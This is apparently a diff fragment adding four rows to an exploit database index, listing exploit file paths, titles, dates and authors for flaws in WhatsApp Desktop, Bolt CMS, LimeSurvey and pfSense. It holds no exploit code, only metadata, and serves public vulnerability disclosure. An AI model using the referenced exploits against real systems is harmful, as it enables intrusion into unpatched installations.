+48295,exploits/multiple/webapps/48295.txt,"WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting",2020-04-06,"Gal Weizman",webapps,multiple,
+48296,exploits/php/webapps/48296.py,"Bolt CMS 3.7.0 - Authenticated Remote Code Execution",2020-04-06,r3m0t3nu11,webapps,php,
+48297,exploits/php/webapps/48297.txt,"LimeSurvey 4.1.11 - 'File Manager' Path Traversal",2020-04-06,"Matthew Aberegg",webapps,php,
+48300,exploits/freebsd/webapps/48300.txt,"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,freebsd,